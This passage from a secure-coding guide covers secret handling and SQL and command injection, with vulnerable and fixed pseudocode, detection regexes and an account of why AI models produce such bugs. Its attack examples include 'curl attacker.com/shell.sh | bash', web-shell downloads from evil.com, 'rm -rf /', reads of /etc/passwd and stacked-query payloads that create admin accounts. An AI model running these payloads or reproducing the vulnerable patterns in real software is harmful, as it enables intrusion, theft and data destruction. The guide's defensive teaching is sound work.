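The `sanitizeForLogging` pseudocode above only inspects top-level keys, so a secret nested inside a `headers` object or a list of replicas would still be logged. One possible recursive variant is sketched here. The marker list is an assumption chosen for illustration, and matching on substrings of key names can both over-redact and under-redact in a real codebase.

```python
# Substrings that mark a key as sensitive (illustrative, tune per codebase).
SENSITIVE_MARKERS = (
    "password", "secret", "token", "credential", "authorization", "api_key", "apikey",
)


def _is_sensitive(key):
    lowered = str(key).lower()
    return any(marker in lowered for marker in SENSITIVE_MARKERS)


def sanitize_for_logging(value):
    """Return a copy of value with sensitive fields replaced by "[REDACTED]"."""
    if isinstance(value, dict):
        return {
            key: "[REDACTED]" if _is_sensitive(key) else sanitize_for_logging(item)
            for key, item in value.items()
        }
    if isinstance(value, (list, tuple)):
        return [sanitize_for_logging(item) for item in value]
    # Scalars are returned unchanged; only key names drive redaction.
    return value
```

Because the function builds new containers instead of mutating its argument, the original config object stays usable for the actual connection after it has been logged.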
+ +--- + +## Common Mistakes Section + +### Mistake 1: .env Files Committed to Git + +```pseudocode +// project/.env (NEVER COMMIT THIS) +DATABASE_URL=postgresql://user:password@localhost/db +API_KEY=sk_live_xxxxxxxxxx +JWT_SECRET=my-secret-key + +// .gitignore (MUST INCLUDE) +.env +.env.local +.env.*.local +*.pem +*.key +credentials.json +secrets.yaml + +// CORRECT: Commit a template instead +// project/.env.example (SAFE TO COMMIT) +DATABASE_URL=postgresql://user:password@localhost/db +API_KEY=your_api_key_here +JWT_SECRET=generate_a_secure_random_string + +// Add pre-commit hook to prevent accidental commits +// .git/hooks/pre-commit +#!/bin/bash +if git diff --cached --name-only | grep -E '\.env$|credentials|secrets'; then + echo "ERROR: Attempting to commit potential secrets file" + exit 1 +fi +``` + +**Detection:** Check git history: `git log --all --full-history -- "*.env" "*credentials*" "*secrets*"` + +--- + +### Mistake 2: Secrets in Error Messages + +```pseudocode +// DANGEROUS: Secrets exposed in error handling + +function connectToPaymentApi(): + try: + apiKey = getApiKey() + response = httpPost( + "https://api.payment.com/connect", + headers = {"Authorization": "Bearer " + apiKey} + ) + catch error: + // Exposes API key in error log and potentially to users + throw new Error("Failed to connect with key: " + apiKey + ". Error: " + error) + +// SECURE: Never include secrets in error messages +function connectToPaymentApi(): + try: + apiKey = getApiKey() + response = httpPost( + "https://api.payment.com/connect", + headers = {"Authorization": "Bearer " + apiKey} + ) + catch error: + // Log correlation ID, not secrets + correlationId = generateUUID() + logger.error("Payment API connection failed", { + "correlationId": correlationId, + "errorCode": error.code, + "endpoint": "api.payment.com" + // No API key! + }) + throw new Error("Payment service unavailable. 
Reference: " + correlationId) +``` + +--- + +### Mistake 3: Secrets in URLs (Query Parameters) + +```pseudocode +// DANGEROUS: Secrets in URL query parameters + +function makeAuthenticatedRequest(endpoint, apiKey): + // API keys in URLs are logged everywhere: + // - Browser history + // - Server access logs + // - Proxy logs + // - Referrer headers + url = "https://api.service.com" + endpoint + "?api_key=" + apiKey + return httpGet(url) + +// Even worse with multiple secrets: +url = "https://api.com/data?key=" + apiKey + "&secret=" + secretKey + +// SECURE: Use headers for authentication +function makeAuthenticatedRequest(endpoint, apiKey): + return httpGet( + "https://api.service.com" + endpoint, + headers = { + "Authorization": "Bearer " + apiKey, + // Or API-specific header + "X-API-Key": apiKey + } + ) +``` + +**Detection:** Search for URLs containing `?api_key=`, `?token=`, `?secret=`, `?password=` + +--- + +## Detection Hints: How to Spot This Pattern in Code Review + +### Automated Detection Patterns + +```pseudocode +// High-confidence patterns to search for: + +// 1. Direct assignment to suspicious variable names +regex: /(password|secret|key|token|credential|api.?key)\s*[=:]\s*["'][^"']+["']/i + +// 2. Common API key formats +regex: /(sk_live_|sk_test_|pk_live_|pk_test_|ghp_|gho_|AKIA|AIza)/ + +// 3. Private key markers +regex: /-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----/ + +// 4. Connection strings with passwords +regex: /(mysql|postgresql|mongodb|redis):\/\/[^:]+:[^@]+@/ + +// 5. 
Base64 encoded secrets (often JWT secrets) +regex: /["'][A-Za-z0-9+\/=]{40,}["']/ +``` + +### Manual Code Review Checklist + +| Check | What to Look For | +|-------|------------------| +| **Constants** | Any string constants in authentication/configuration code | +| **Config Objects** | Credential fields with non-placeholder values | +| **Connection Code** | Database connections, API clients with inline credentials | +| **Test Files** | Test credentials that might be real or become real | +| **CI/CD** | Pipeline configs, Docker files, deployment scripts | +| **Comments** | "TODO: move to env" comments with actual secrets | + +### Tools for Detection + +1. **git-secrets** - Prevents committing secrets to git +2. **truffleHog** - Scans git history for secrets +3. **GitGuardian** - SaaS secret detection +4. **gitleaks** - SAST tool for detecting secrets +5. **detect-secrets** - Yelp's secret detection tool + +--- + +## Security Checklist + +- [ ] No credentials, API keys, or secrets in source code +- [ ] No secrets in configuration files committed to version control +- [ ] `.gitignore` includes all secret file patterns (`.env`, `*.pem`, etc.) 
+- [ ] Pre-commit hooks prevent accidental secret commits +- [ ] Environment variables or secrets manager used for all credentials +- [ ] No secrets in CI/CD configuration files (use platform secrets) +- [ ] No secrets in Docker images or Dockerfile +- [ ] Logging sanitizes sensitive fields +- [ ] Error messages never include secrets +- [ ] No secrets in URL query parameters +- [ ] Test credentials are clearly fake and cannot work in production +- [ ] Secret scanning enabled in repository settings + +--- + +# Pattern 2: SQL Injection and Command Injection + +**CWE References:** CWE-89 (SQL Injection), CWE-77 (Command Injection), CWE-78 (OS Command Injection) + +**Priority Score:** 22/21 (SQL: Frequency 10, Severity 10, Detectability 4; Command: Frequency 8, Severity 10, Detectability 6) + +--- + +## Introduction: Why This Remains Prevalent in AI-Generated Code + +SQL injection and command injection are among the oldest known vulnerability classes, yet they continue to plague AI-generated code at alarming rates. Despite decades of secure coding education and well-established mitigation patterns, AI models persistently generate vulnerable code. + +**Why AI Models Generate Injection Vulnerabilities:** + +1. **Training Data Contamination:** Research shows that string-concatenated queries appear "thousands of times" in AI training data from GitHub repositories. The vulnerable pattern is statistically more common than the secure pattern in historical codebases. + +2. **Simplicity Bias:** String concatenation is syntactically simpler than parameterized queries. AI models optimize for generating "working code" and the concatenated approach requires fewer tokens and concepts. + +3. **Missing Adversarial Awareness:** AI models don't inherently think about how user input might be malicious. When asked to "query users by ID," the model focuses on the functional requirement, not the security implications. + +4. 
**Tutorial Code Prevalence:** Many tutorials and documentation examples show vulnerable patterns for brevity. AI learns that `f"SELECT * FROM users WHERE id = {id}"` is a valid pattern. + +5. **Context Limitation:** The AI cannot see your full application architecture, threat model, or data flow. It doesn't know which inputs come from untrusted sources. + +**Impact Statistics:** + +- **SQL Injection (CWE-89):** Ranked #2 in CWE Top 25 Most Dangerous Software Weaknesses (2025) +- **Command Injection (CWE-78):** Ranked #9 in CWE Top 25 (2025) +- **20% SQL Injection failure rate** across AI-generated tasks (Veracode 2025) +- **8 directly concatenated queries** found in a single testing session (Invicti Security) +- **CVE-2025-53773:** A real command injection vulnerability in GitHub Copilot code + +--- + +## SQL Injection: Multiple BAD Examples + +### BAD Example 1: String Concatenation in SELECT + +```pseudocode +// VULNERABLE: Direct string concatenation +function getUserById(userId): + query = "SELECT * FROM users WHERE id = " + userId + return database.execute(query) + +// Even worse with f-string/template literal +function getUserByEmail(email): + query = f"SELECT * FROM users WHERE email = '{email}'" + return database.execute(query) + +// Attack: email = "' OR '1'='1' --" +// Result: SELECT * FROM users WHERE email = '' OR '1'='1' --' +// Returns ALL users in the database +``` + +**Why This Is Dangerous:** +- Attacker controls the query structure, not just a value +- Can extract entire database contents +- Can bypass authentication with `' OR '1'='1` patterns +- Comments (`--`, `#`, `/**/`) can truncate remainder of query + +--- + +### BAD Example 2: Dynamic Table/Column Names + +```pseudocode +// VULNERABLE: User-controlled table name +function getDataFromTable(tableName, id): + query = f"SELECT * FROM {tableName} WHERE id = {id}" + return database.execute(query) + +// Attack: tableName = "users; DROP TABLE users; --" +// Result: SELECT * FROM users; DROP TABLE 
users; -- WHERE id = 1 + +// VULNERABLE: User-controlled column names +function sortUsers(sortColumn, sortOrder): + query = f"SELECT * FROM users ORDER BY {sortColumn} {sortOrder}" + return database.execute(query) + +// Attack: sortColumn = "(SELECT password FROM users WHERE is_admin=1)" +// Result: Data exfiltration through error messages or timing +``` + +**Why This Is Dangerous:** +- Parameterized queries cannot protect table/column names +- Enables schema manipulation attacks +- Can execute arbitrary SQL statements via stacking +- Attackers can extract data through subquery injection + +--- + +### BAD Example 3: ORDER BY Injection + +```pseudocode +// VULNERABLE: ORDER BY with user input +function getProductList(category, sortBy): + query = f"SELECT * FROM products WHERE category = ? ORDER BY {sortBy}" + return database.execute(query, [category]) + +// Attack: sortBy = "price, (CASE WHEN (SELECT password FROM users LIMIT 1) +// LIKE 'a%' THEN price ELSE name END)" +// Result: Boolean-based blind SQL injection + +// Attack: sortBy = "IF(1=1, price, name)" +// Result: Confirms SQL injection is possible +``` + +**Why This Is Dangerous:** +- Developers often parameterize WHERE but forget ORDER BY +- Cannot use standard parameterization for ORDER BY +- Enables blind SQL injection through conditional ordering +- Error-based extraction through invalid column references + +--- + +### BAD Example 4: LIKE Clause Injection + +```pseudocode +// VULNERABLE: Unescaped LIKE pattern +function searchProducts(searchTerm): + query = f"SELECT * FROM products WHERE name LIKE '%{searchTerm}%'" + return database.execute(query) + +// Attack: searchTerm = "%' UNION SELECT username, password, null FROM users --" +// Result: UNION-based data extraction + +// Even "safer" version has issues: +function searchProductsSafe(searchTerm): + query = "SELECT * FROM products WHERE name LIKE ?" 
+ return database.execute(query, [f"%{searchTerm}%"]) + +// Attack: searchTerm = "%" (matches everything - DoS through performance) +// Attack: searchTerm = "_" repeated (wildcard matching - info disclosure) +``` + +**Why This Is Dangerous:** +- LIKE patterns need double escaping (SQL + LIKE wildcards) +- `%` and `_` are valid in parameterized queries but dangerous in LIKE +- Performance-based DoS through expensive wildcard patterns +- Can probe for data existence through LIKE behavior + +--- + +### BAD Example 5: Batch/Stacked Query Injection + +```pseudocode +// VULNERABLE: Query that allows stacking +function updateUserEmail(userId, newEmail): + query = f"UPDATE users SET email = '{newEmail}' WHERE id = {userId}" + database.execute(query, multiStatement = true) + +// Attack: newEmail = "x'; INSERT INTO users (email, role) VALUES ('attacker@evil.com', 'admin'); --" +// Result: Creates new admin account + +// Attack: newEmail = "x'; UPDATE users SET password = 'hacked' WHERE role = 'admin'; --" +// Result: Mass password reset for all admins +``` + +**Why This Is Dangerous:** +- Some database drivers allow multiple statements by default +- Single injection point enables unlimited query execution +- Can create backdoor accounts, modify permissions, exfiltrate data +- Often missed because original query "succeeds" + +--- + +## Command Injection: Multiple BAD Examples + +### BAD Example 1: Shell Command Construction + +```pseudocode +// VULNERABLE: Direct command construction +function pingHost(hostname): + command = "ping -c 4 " + hostname + return shell.execute(command) + +// Attack: hostname = "127.0.0.1; cat /etc/passwd" +// Result: ping -c 4 127.0.0.1; cat /etc/passwd +// Executes both commands + +// VULNERABLE: Using shell=True with format strings +function checkDiskUsage(directory): + command = f"du -sh {directory}" + return subprocess.run(command, shell=True) + +// Attack: directory = "/tmp; rm -rf /" +// Result: Destructive command execution +``` + +**Why 
This Is Dangerous:** +- Shell metacharacters (`;`, `|`, `&`, `$()`, backticks) enable command chaining +- Attacker gains shell access on the server +- Can read sensitive files, install malware, pivot to other systems +- Shell=True interprets all special characters + +--- + +### BAD Example 2: Path Manipulation in Commands + +```pseudocode +// VULNERABLE: File path from user input +function convertImage(inputFile, outputFile): + command = f"convert {inputFile} -resize 800x600 {outputFile}" + return shell.execute(command) + +// Attack: inputFile = "image.jpg; curl attacker.com/shell.sh | bash" +// Result: Downloads and executes malware + +// Attack: inputFile = "$(cat /etc/passwd > /tmp/out.txt)image.jpg" +// Result: File exfiltration via command substitution + +// VULNERABLE: Filename in archiving +function createBackup(filename): + command = f"tar -czf backup.tar.gz {filename}" + return shell.execute(command) + +// Attack: filename = "--checkpoint=1 --checkpoint-action=exec=sh\ shell.sh" +// Result: tar option injection (GTFOBins-style attack) +``` + +**Why This Is Dangerous:** +- Paths often contain attacker-controlled portions (uploaded filenames) +- Command-line tools have dangerous flag behaviors (GTFOBins) +- Argument injection even without shell metacharacters +- `$(...)` and backticks execute subcommands + +--- + +### BAD Example 3: Argument Injection + +```pseudocode +// VULNERABLE: Arguments from user input +function fetchUrl(url): + command = f"curl {url}" + return shell.execute(command) + +// Attack: url = "-o /var/www/html/shell.php http://evil.com/shell.php" +// Result: Writes file to webserver (web shell) + +// Attack: url = "--config /etc/passwd" +// Result: Error message reveals file contents + +// VULNERABLE: Git commands with user input +function cloneRepository(repoUrl): + command = f"git clone {repoUrl}" + return shell.execute(command) + +// Attack: repoUrl = "--upload-pack='touch /tmp/pwned' git://evil.com/repo" +// Result: Arbitrary command 
execution via git options +``` + +**Why This Is Dangerous:** +- Programs interpret flags anywhere in argument list +- Can override intended behavior via injected flags +- `--` doesn't always prevent injection (depends on program) +- Many tools have "write file" or "execute" options + +--- + +### BAD Example 4: Environment Variable Injection + +```pseudocode +// VULNERABLE: User-controlled environment variable +function runWithCustomPath(command, customPath): + environment = {"PATH": customPath} + return subprocess.run(command, env=environment, shell=True) + +// Attack: customPath = "/tmp/evil:$PATH" +// If /tmp/evil contains malicious 'ls' binary, it executes instead + +// VULNERABLE: Library path manipulation +function loadPlugin(pluginPath): + environment = {"LD_PRELOAD": pluginPath} + return subprocess.run("target-app", env=environment) + +// Attack: pluginPath = "/tmp/evil.so" +// Result: Malicious shared library loaded, code execution +``` + +**Why This Is Dangerous:** +- Environment variables affect program behavior in unexpected ways +- PATH hijacking allows executing attacker binaries +- LD_PRELOAD/DYLD_INSERT_LIBRARIES enable library injection +- Some programs read secrets from environment (unintended exposure) + +--- + +## GOOD Examples: Proper Patterns + +### GOOD Example 1: Parameterized Queries (All Major DB Patterns) + +```pseudocode +// SECURE: Parameterized query - positional parameters +function getUserById(userId): + query = "SELECT * FROM users WHERE id = ?" 
+ return database.execute(query, [userId]) + +// SECURE: Named parameters +function getUserByEmailAndStatus(email, status): + query = "SELECT * FROM users WHERE email = :email AND status = :status" + return database.execute(query, {email: email, status: status}) + +// SECURE: Multiple value insertion +function createUser(name, email, role): + query = "INSERT INTO users (name, email, role) VALUES (?, ?, ?)" + return database.execute(query, [name, email, role]) + +// SECURE: IN clause with dynamic count +function getUsersByIds(userIds): + placeholders = ", ".join(["?" for _ in userIds]) + query = f"SELECT * FROM users WHERE id IN ({placeholders})" + return database.execute(query, userIds) + +// SECURE: Transaction with multiple parameterized queries +function transferFunds(fromId, toId, amount): + database.beginTransaction() + try: + database.execute("UPDATE accounts SET balance = balance - ? WHERE id = ?", [amount, fromId]) + database.execute("UPDATE accounts SET balance = balance + ? WHERE id = ?", [amount, toId]) + database.commit() + catch error: + database.rollback() + throw error +``` + +**Why This Is Secure:** +- Database driver separates query structure from data +- Parameters are never interpreted as SQL +- Works with all standard data types +- Prevents all SQL injection variants in value positions + +--- + +### GOOD Example 2: ORM Safe Usage + +```pseudocode +// SECURE: ORM with typed queries +function getUserById(userId): + return User.findOne({where: {id: userId}}) + +// SECURE: ORM with relationships +function getUserWithOrders(userId): + return User.findOne({ + where: {id: userId}, + include: [{model: Order, as: 'orders'}] + }) + +// SECURE: ORM query builder +function searchProducts(filters): + query = Product.query() + + if filters.category: + query = query.where('category', '=', filters.category) + if filters.minPrice: + query = query.where('price', '>=', filters.minPrice) + if filters.maxPrice: + query = query.where('price', '<=', filters.maxPrice) 
+ + return query.get() + +// WARNING: ORM raw query - still needs parameterization! +function customQuery(userId): + // STILL VULNERABLE if using string interpolation: + // return database.raw(f"SELECT * FROM users WHERE id = {userId}") + + // SECURE: Use ORM's parameterization + return database.raw("SELECT * FROM users WHERE id = ?", [userId]) +``` + +**Why This Is Secure:** +- ORM handles parameterization automatically +- Type checking prevents some injection attempts +- Query builders construct safe queries programmatically +- Still requires care with raw queries + +--- + +### GOOD Example 3: Safe Dynamic Table/Column Names (Allowlist) + +```pseudocode +// SECURE: Allowlist for table names +ALLOWED_TABLES = {"users", "products", "orders", "categories"} + +function getDataFromTable(tableName, id): + if tableName not in ALLOWED_TABLES: + throw ValidationError("Invalid table name") + + // Safe because tableName is from allowlist, not user input + query = f"SELECT * FROM {tableName} WHERE id = ?" + return database.execute(query, [id]) + +// SECURE: Allowlist for sort columns +SORT_COLUMNS = { + "name": "name", + "price": "price", + "date": "created_at", + "popularity": "view_count" +} + +function getProducts(sortBy, sortOrder): + column = SORT_COLUMNS.get(sortBy, "name") // Default to 'name' + direction = "DESC" if sortOrder == "desc" else "ASC" + + query = f"SELECT * FROM products ORDER BY {column} {direction}" + return database.execute(query) + +// SECURE: Quoted identifiers as additional defense +function getDataDynamic(tableName, columnName, value): + if tableName not in ALLOWED_TABLES: + throw ValidationError("Invalid table") + if columnName not in ALLOWED_COLUMNS[tableName]: + throw ValidationError("Invalid column") + + // Use database quoting function for identifiers + quotedTable = database.quoteIdentifier(tableName) + quotedColumn = database.quoteIdentifier(columnName) + + query = f"SELECT * FROM {quotedTable} WHERE {quotedColumn} = ?" 
+ return database.execute(query, [value]) +``` + +**Why This Is Secure:** +- Allowlist ensures only known-safe values used +- User input maps to predefined safe values +- Identifier quoting provides defense-in-depth +- Validation happens before query construction + +--- + +### GOOD Example 4: Safe Command Execution + +```pseudocode +// SECURE: Argument array (no shell interpretation) +function pingHost(hostname): + // Validate hostname format first + if not isValidHostname(hostname): + throw ValidationError("Invalid hostname format") + + // Use argument array - shell metacharacters are literal + result = subprocess.run( + ["ping", "-c", "4", hostname], + shell = false, // CRITICAL: no shell interpretation + capture_output = true, + timeout = 30 + ) + return result.stdout + +// SECURE: Allowlist for command arguments +ALLOWED_FORMATS = {"png", "jpg", "gif", "webp"} + +function convertImage(inputPath, outputPath, format): + // Validate format from allowlist + if format not in ALLOWED_FORMATS: + throw ValidationError("Invalid format") + + // Validate paths are within allowed directory + if not isPathWithinDirectory(inputPath, UPLOAD_DIR): + throw ValidationError("Invalid input path") + if not isPathWithinDirectory(outputPath, OUTPUT_DIR): + throw ValidationError("Invalid output path") + + // Safe argument array + result = subprocess.run( + ["convert", inputPath, "-resize", "800x600", f"{outputPath}.{format}"], + shell = false + ) + return result + +// SECURE: Using libraries instead of shell commands +function checkDiskUsage(directory): + // Use language-native library instead of shell + return filesystem.getDirectorySize(directory) + +function readJsonFile(filepath): + // Don't use: shell.execute(f"cat {filepath} | jq .") + // Use language JSON library + return json.parse(filesystem.readFile(filepath)) +``` + +**Why This Is Secure:** +- Argument arrays pass arguments directly to program +- No shell interpretation of metacharacters +- Allowlists prevent unexpected 
values +- Path validation prevents directory traversal +- Native libraries avoid shell entirely + +--- + +## Edge Cases Section + +### Edge Case 1: Second-Order Injection (Stored Then Executed) + +```pseudocode +// DANGEROUS: Data stored safely but used unsafely later + +// Step 1: User creates profile (looks safe) +function createProfile(userId, displayName): + // Parameterized - SAFE for initial storage + query = "INSERT INTO profiles (user_id, display_name) VALUES (?, ?)" + database.execute(query, [userId, displayName]) + // Attacker sets displayName = "admin'--" + +// Step 2: Background job uses stored data UNSAFELY +function generateReportForUser(userId): + // Get the stored display name + profile = database.execute("SELECT display_name FROM profiles WHERE user_id = ?", [userId]) + displayName = profile.display_name + // "admin'--" retrieved from database + + // VULNERABLE: Trusting data from database + reportQuery = f"INSERT INTO reports (title) VALUES ('Report for {displayName}')" + database.execute(reportQuery) + // Result: INSERT INTO reports (title) VALUES ('Report for admin'--') + +// SECURE: Parameterize ALL queries, even with "internal" data +function generateReportForUserSafe(userId): + profile = database.execute("SELECT display_name FROM profiles WHERE user_id = ?", [userId]) + + // Still parameterize even though data is from database + reportQuery = "INSERT INTO reports (title) VALUES (?)" + database.execute(reportQuery, [f"Report for {profile.display_name}"]) +``` + +**Detection:** Audit all code paths where database data is used in subsequent queries. 
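
To make the second-order case concrete, here is a small runnable sketch using Python's standard `sqlite3` module with an in-memory database. The table layout mirrors the pseudocode above, but the schema and the function name `generate_report_for_user` are assumptions for illustration. The stored payload `admin'--` is read back and reused, and because the follow-up query is parameterized it is stored as plain text rather than altering the statement.

```python
import sqlite3


def generate_report_for_user(connection, user_id):
    """Build a report title from stored profile data without trusting it."""
    row = connection.execute(
        "SELECT display_name FROM profiles WHERE user_id = ?", (user_id,)
    ).fetchone()
    if row is None:
        raise LookupError(f"no profile for user {user_id}")
    # The value came from our own database, but it is still attacker-controlled
    # text, so it goes in as a bound parameter, never into the SQL string.
    title = f"Report for {row[0]}"
    connection.execute("INSERT INTO reports (title) VALUES (?)", (title,))
    return title


connection = sqlite3.connect(":memory:")
connection.execute(
    "CREATE TABLE profiles (user_id INTEGER PRIMARY KEY, display_name TEXT)"
)
connection.execute("CREATE TABLE reports (title TEXT)")

# Step 1: the attacker's display name is stored safely.
connection.execute(
    "INSERT INTO profiles (user_id, display_name) VALUES (?, ?)", (1, "admin'--")
)

# Step 2: the stored value is reused in a later query, still parameterized.
generate_report_for_user(connection, 1)
stored_titles = [row[0] for row in connection.execute("SELECT title FROM reports")]
```

The f-string here only builds the data value; the SQL text passed to `execute` is a constant, which is the property worth checking for in review.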
+ +--- + +### Edge Case 2: Injection in Stored Procedures + +```pseudocode +// DANGEROUS: Dynamic SQL inside stored procedure + +// Stored Procedure Definition (in database) +CREATE PROCEDURE searchUsers(searchTerm VARCHAR(100)) +BEGIN + // VULNERABLE: Dynamic SQL construction + SET @query = CONCAT('SELECT * FROM users WHERE name LIKE ''%', searchTerm, '%'''); + PREPARE stmt FROM @query; + EXECUTE stmt; +END + +// Application code looks safe... +function searchUsers(term): + return database.callProcedure("searchUsers", [term]) + // But injection still occurs inside the procedure! + +// SECURE: Parameterized even in stored procedures +CREATE PROCEDURE searchUsersSafe(searchTerm VARCHAR(100)) +BEGIN + // Use parameterization within procedure + SELECT * FROM users WHERE name LIKE CONCAT('%', searchTerm, '%'); + // Or use prepared statement properly + SET @query = 'SELECT * FROM users WHERE name LIKE ?'; + SET @search = CONCAT('%', searchTerm, '%'); + PREPARE stmt FROM @query; + EXECUTE stmt USING @search; +END +``` + +**Detection:** Review all stored procedures for dynamic SQL construction. 
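
A first pass over stored procedures can be scripted before a manual review. The sketch below is a hedged heuristic, assuming MySQL-style syntax like the procedures above and assuming the procedure bodies are available as text; the regexes and the function name `has_concatenated_dynamic_sql` are hypothetical. It flags a body when the same user variable is both assigned from `CONCAT(...)` and passed to `PREPARE ... FROM`.

```python
import re

# A user variable assigned from CONCAT(...), e.g. SET @query = CONCAT('SELECT ...', term)
CONCAT_ASSIGNMENT = re.compile(r"SET\s+(@\w+)\s*=\s*CONCAT\s*\(", re.IGNORECASE)

# A statement prepared from a user variable, e.g. PREPARE stmt FROM @query
PREPARE_FROM = re.compile(r"PREPARE\s+\w+\s+FROM\s+(@\w+)", re.IGNORECASE)


def has_concatenated_dynamic_sql(procedure_body):
    """Return True if a CONCAT-built variable is later used as statement text."""
    concatenated = {name.lower() for name in CONCAT_ASSIGNMENT.findall(procedure_body)}
    prepared = {name.lower() for name in PREPARE_FROM.findall(procedure_body)}
    return bool(concatenated & prepared)
```

The check passes the safe procedure because `@search` is built with `CONCAT` but only bound through `EXECUTE ... USING`, while the statement text `@query` is a constant. It will not see concatenation done with other operators or across several variables, so a clean result still calls for a manual read.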
+ +--- + +### Edge Case 3: Injection Through Encoding Bypass + +```pseudocode +// DANGEROUS: Encoding-based bypass attempts + +// Scenario 1: Double-encoding bypass +function searchWithFilter(term): + // Application URL-decodes once + decoded = urlDecode(term) // %2527 -> %27 + + // WAF sees %27, not single quote + // Second decode happens: %27 -> ' + + query = f"SELECT * FROM items WHERE name = '{decoded}'" + // Injection succeeds + +// Scenario 2: Unicode normalization bypass +function filterUsername(username): + // Check for dangerous characters + if "'" in username or "\"" in username: + throw ValidationError("Invalid characters") + + // VULNERABLE: Unicode normalization happens AFTER validation + normalized = unicodeNormalize(username) + // 'ʼ' (U+02BC) might normalize to "'" (U+0027) in some systems + + query = f"SELECT * FROM users WHERE username = '{normalized}'" + +// SECURE: Parameterization makes encoding irrelevant +function searchSafe(term): + // Encoding doesn't matter - it's just data + query = "SELECT * FROM items WHERE name = ?" + return database.execute(query, [term]) + +// SECURE: Validate AFTER all normalization +function filterUsernameSafe(username): + // Normalize first + normalized = unicodeNormalize(username) + + // Then validate + if not isValidUsernameChars(normalized): + throw ValidationError("Invalid characters") + + // Then use (still with parameterization) + query = "SELECT * FROM users WHERE username = ?" + return database.execute(query, [normalized]) +``` + +**Detection:** Test with various encoded payloads (`%27`, `%2527`, Unicode variants). + +--- + +## Common Mistakes Section + +### Mistake 1: Thinking Escaping Is Enough + +```pseudocode +// DANGEROUS: Manual escaping is error-prone + +function getUserByNameEscaped(name): + // "Escaping" by replacing quotes + escapedName = name.replace("'", "''") + query = f"SELECT * FROM users WHERE name = '{escapedName}'" + return database.execute(query) + +// Problems with this approach: +// 1. 
Different databases have different escape rules +// 2. Multibyte character encoding bypasses (GBK, etc.) +// 3. Doesn't handle all injection vectors +// 4. Easy to forget in one place +// 5. Backslash escaping varies by database + +// Attack (MySQL with NO_BACKSLASH_ESCAPES off): +// name = "\' OR 1=1 --" +// Result: \'' OR 1=1 -- (backslash escapes first quote) + +// Attack (multibyte): name = 0xbf27 +// In GBK: 0xbf5c27 -> valid multibyte char + literal quote + +// ALWAYS USE PARAMETERIZATION - it's not about escaping +function getUserByNameSafe(name): + query = "SELECT * FROM users WHERE name = ?" + return database.execute(query, [name]) +``` + +**Key Insight:** Parameterization doesn't "escape" - it sends query structure and data separately. + +--- + +### Mistake 2: Trusting "Internal" Data Sources + +```pseudocode +// DANGEROUS: Trusting data because it's "internal" + +function processMessage(messageFromQueue): + // "This is from our internal queue, so it's safe" + userId = messageFromQueue.userId + + query = f"SELECT * FROM users WHERE id = {userId}" + return database.execute(query) + +// BUT: Where did that queue message originate? +// - User input that was serialized to queue +// - External API response stored in queue +// - Another service that has its own vulnerabilities + +// DANGEROUS: Trusting data from other tables/services +function getOrderDetails(orderId): + order = database.execute("SELECT * FROM orders WHERE id = ?", [orderId]) + + // Order.notes was user-supplied + query = f"SELECT * FROM notes WHERE content LIKE '%{order.notes}%'" + // Still vulnerable to second-order injection + +// SECURE: Parameterize ALL queries regardless of data source +function processMessageSafe(messageFromQueue): + query = "SELECT * FROM users WHERE id = ?" + return database.execute(query, [messageFromQueue.userId]) +``` + +**Rule:** Never trust ANY data in query construction - always parameterize. 
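
The queue scenario can be sketched the same way. This example assumes messages arrive as JSON strings and uses an in-memory SQLite `users` table. The message shape and helper names are hypothetical.

```python
import json
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO users (id, name) VALUES (?, ?)", [(1, "alice"), (2, "bob")]
    )
    return conn


def process_message_unsafe(conn: sqlite3.Connection, raw_message: str) -> list:
    # VULNERABLE: the "internal" queue payload is interpolated into the query.
    user_id = json.loads(raw_message)["userId"]
    return conn.execute(
        f"SELECT name FROM users WHERE id = {user_id} ORDER BY id"
    ).fetchall()


def process_message_safe(conn: sqlite3.Connection, raw_message: str) -> list:
    # SECURE: the value is bound as data, whatever its origin.
    user_id = json.loads(raw_message)["userId"]
    return conn.execute(
        "SELECT name FROM users WHERE id = ? ORDER BY id", (user_id,)
    ).fetchall()


# A message some upstream producer serialized from user input.
POISONED = json.dumps({"userId": "1 OR 1=1"})

if __name__ == "__main__":
    db = make_db()
    print(process_message_unsafe(db, POISONED))  # every user is returned
    print(process_message_safe(db, POISONED))    # no row matches the literal text
```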
+ +--- + +### Mistake 3: Partial Parameterization + +```pseudocode +// DANGEROUS: Parameterizing some parts but not others + +function searchUsers(name, sortColumn, limit): + // Parameterized the value, but not ORDER BY or LIMIT + query = f"SELECT * FROM users WHERE name = ? ORDER BY {sortColumn} LIMIT {limit}" + return database.execute(query, [name]) + +// Attack: sortColumn = "1; DELETE FROM users; --" +// Attack: limit = "1 UNION SELECT password FROM admin_users" + +// DANGEROUS: Parameterized WHERE but not table +function getDataFlexible(tableName, filterColumn, filterValue): + query = f"SELECT * FROM {tableName} WHERE {filterColumn} = ?" + return database.execute(query, [filterValue]) + // Table name and column still injectable + +// SECURE: Validate/allowlist everything that can't be parameterized +function searchUsersSafe(name, sortColumn, limit): + // Allowlist for sort column + allowedSorts = {"name", "email", "created_at"} + sortCol = sortColumn if sortColumn in allowedSorts else "name" + + // Validate limit is positive integer + limitNum = min(max(int(limit), 1), 100) // Clamp to 1-100 + + query = f"SELECT * FROM users WHERE name = ? ORDER BY {sortCol} LIMIT {limitNum}" + return database.execute(query, [name]) +``` + +**Key Insight:** Every injectable position needs either parameterization or allowlist validation. + +--- + +## Detection Hints and Testing Approaches + +### Automated Detection Patterns + +```pseudocode +// Regex patterns to find SQL injection vulnerabilities: + +// 1. String concatenation with SQL keywords +regex: /(SELECT|INSERT|UPDATE|DELETE|FROM|WHERE|ORDER BY).*(\+|\.concat|\$\{|f['"])/i + +// 2. Format strings with SQL +regex: /f["'].*\b(SELECT|INSERT|UPDATE|DELETE)\b.*\{.*\}/i + +// 3. String interpolation in queries +regex: /execute\s*\(\s*["`'].*\$\{?[a-zA-Z_]/ + +// Command injection patterns: + +// 4. 
